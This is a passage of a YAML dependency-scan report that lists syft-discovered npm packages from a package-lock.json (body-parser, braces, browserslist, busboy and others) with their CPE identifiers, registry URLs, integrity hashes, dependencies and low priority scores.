- cpe: cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/binary-extensions@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz
|
|
integrity: sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d29a5e4fb92420c3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: body-parser 1.20.5'
|
|
title: body-parser 1.20.5
|
|
description: 'Package discovered: body-parser 1.20.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 04b33f5cfaf593a5
|
|
name: body-parser
|
|
version: 1.20.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/body-parser@1.20.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz
|
|
integrity: sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA==
|
|
dependencies:
|
|
bytes: ~3.1.2
|
|
content-type: ~1.0.5
|
|
debug: 2.6.9
|
|
depd: 2.0.0
|
|
destroy: ~1.2.0
|
|
http-errors: ~2.0.1
|
|
iconv-lite: ~0.4.24
|
|
on-finished: ~2.4.1
|
|
qs: ~6.15.1
|
|
raw-body: ~2.5.3
|
|
type-is: ~1.6.18
|
|
unpipe: ~1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8d245dad35d0de48
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: brace-expansion 2.1.0'
|
|
title: brace-expansion 2.1.0
|
|
description: 'Package discovered: brace-expansion 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 833f3564230327b0
|
|
name: brace-expansion
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/brace-expansion@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz
|
|
integrity: sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==
|
|
dependencies:
|
|
balanced-match: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2c758a1366af3ce7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: braces 3.0.3'
|
|
title: braces 3.0.3
|
|
description: 'Package discovered: braces 3.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e8863a3d87ad712b
|
|
name: braces
|
|
version: 3.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
- cpe: cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/braces@3.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/braces/-/braces-3.0.3.tgz
|
|
integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==
|
|
dependencies:
|
|
fill-range: ^7.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4acea70fbe4d3073
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: brotli 1.3.3'
|
|
title: brotli 1.3.3
|
|
description: 'Package discovered: brotli 1.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6bc686959e36e164
|
|
name: brotli
|
|
version: 1.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/brotli@1.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz
|
|
integrity: sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg==
|
|
dependencies:
|
|
base64-js: ^1.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 08e716a2d2fe7179
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: browserify-zlib 0.2.0'
|
|
title: browserify-zlib 0.2.0
|
|
description: 'Package discovered: browserify-zlib 0.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: adb6ab9adab6e7b8
|
|
name: browserify-zlib
|
|
version: 0.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/browserify-zlib@0.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz
|
|
integrity: sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA==
|
|
dependencies:
|
|
pako: ~1.0.5
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 27d8113ce8ad07e6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: browserslist 4.28.2'
|
|
title: browserslist 4.28.2
|
|
description: 'Package discovered: browserslist 4.28.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4688a05ee871df84
|
|
name: browserslist
|
|
version: 4.28.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/browserslist@4.28.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz
|
|
integrity: sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==
|
|
dependencies:
|
|
baseline-browser-mapping: ^2.10.12
|
|
caniuse-lite: ^1.0.30001782
|
|
electron-to-chromium: ^1.5.328
|
|
node-releases: ^2.0.36
|
|
update-browserslist-db: ^1.2.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4b1e259ceb7e99ec
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: buffer-equal-constant-time 1.0.1'
|
|
title: buffer-equal-constant-time 1.0.1
|
|
description: 'Package discovered: buffer-equal-constant-time 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ea42e35a908d5ccd
|
|
name: buffer-equal-constant-time
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/buffer-equal-constant-time@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz
|
|
integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 991f80bfd3038fd0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: buffer-from 1.1.2'
|
|
title: buffer-from 1.1.2
|
|
description: 'Package discovered: buffer-from 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 98e22d90241a7628
|
|
name: buffer-from
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/buffer-from@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz
|
|
integrity: sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e092abe833e5a95d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: busboy 1.6.0'
|
|
title: busboy 1.6.0
|
|
description: 'Package discovered: busboy 1.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3009b8237fb85cf0
|
|
name: busboy
|
|
version: 1.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/busboy@1.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz
|
|
integrity: sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==
|
|
dependencies:
|
|
streamsearch: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 81eb78c52edce0ec
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: bytes 3.1.2'
|
|
title: bytes 3.1.2
|
|
description: 'Package discovered: bytes 3.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f9a24c0655f5cc44
|
|
name: bytes
|
|
version: 3.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/bytes@3.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz
|
|
integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a35927eb13a2081e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: call-bind-apply-helpers 1.0.2'
|
|
title: call-bind-apply-helpers 1.0.2
|
|
description: 'Package discovered: call-bind-apply-helpers 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2303cf02934afa6a
|
|
name: call-bind-apply-helpers
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
